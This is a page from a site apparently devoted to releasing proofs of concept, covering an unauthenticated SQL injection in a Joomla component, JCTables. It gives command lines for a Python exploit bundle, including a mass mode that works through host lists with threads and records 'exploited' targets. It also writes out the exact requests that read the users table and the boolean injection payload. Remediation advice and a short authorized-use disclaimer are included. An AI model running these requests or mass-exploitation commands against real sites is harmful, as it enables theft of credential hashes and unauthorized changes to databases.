POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlacritical

CVE-2026-76570 — Joomla JCTables (com_jctables) Unauthenticated SQL Read/Write via JSON API

September 30, 2026 · 210 views

Joomcode JCTables 1.0.0–1.20.0: unauthenticated front-end JSON tasks (getdatarow, getrow) concatenate table/column names into SQL with broken escaping — arbitrary DB read/write (CWE-89/CWE-862). CVSS 4.0 10.0 Critical (AT:N). Fixed in 1.21.1+. Python PoC proves user row read (POCBIT-76570-OK); check + exploit + mass -j.

#joomla#jctables#com_jctables#sqli#sql-injection#cms#unauthenticated#cwe-89#cwe-862#critical

CVE:

CVE-2026-76570

Date:

2026-09-30

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-76570 — Joomcode JCTables (com_jctables) for Joomla — unauthenticated SQL injection on the public JSON CRUD API.

| | | |---|---| | CNA | Joomla! Project (PUBLISHED 2026-09-30) | | Affected | 1.0.0 – 1.20.0 (lab confirms ≤ 1.10.31.2) | | Fix | ≥ 1.21.1 (2026-08-05) | | CWE | CWE-89, CWE-862 | | CVSS 4.0 | 10.0 Critical — AT:N (no special admin configuration) |

Front-end controller tasks run without token / ACL. Table and column identifiers from the request are concatenated into SQL; ladb_escape() mishandles quote-wrapped values. getdatarow can read arbitrary tables (e.g. {prefix}users). Chained attacks (admin login / plugin RCE) are discussed in community write-ups; this PoC proves read (username / password hash row).

PoC page: https://pocbit.org/pocs/cve-2026-76570

GitHub: murrez/CVE-2026-76570

CVE.org: CVE-2026-76570

NVD: CVE-2026-76570

Bundled tool (Python 3)

Download cve-2026-76570.py — PoCbit bundle extractor (writes poc.py, _engine.py, _lab_test.py).

pip install requests urllib3 colorama

python cve-2026-76570.py
python poc.py --lab
python poc.py -u https://site.tld --check
python poc.py -u https://site.tld --prefix jos_
python poc.py --check hosts.txt -t 20
python poc.py hits.txt -t 12
python _engine.py --help

| Mode | Behavior | |------|----------| | check | Fingerprint com_jctables, version, JSON API reachability | | exploit | Read proof from {prefix}users via getdatarow; marker POCBIT-76570-OK | | mass | Interactive or --check / list file + threads → hits.txt, exploited.txt |

API surface

| Step | Request | |------|---------| | Read row | GET index.php?option=com_jctables&format=json&task=getdatarow&tn={prefix}users&idx=id&rid=1 | | Boolean probe | GET …&task=getrow&mid=N&tid=T&idx='' OR (1=1) OR '' |

Remediation

  1. Upgrade JCTables to 1.21.1+ or remove the component.
  2. Inventory Joomla sites for com_jctables in extension lists.
  3. Review DB logs for unusual getdatarow / getrow access from anonymous IPs.

Legal and ethical use

Authorized security testing and patch validation only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →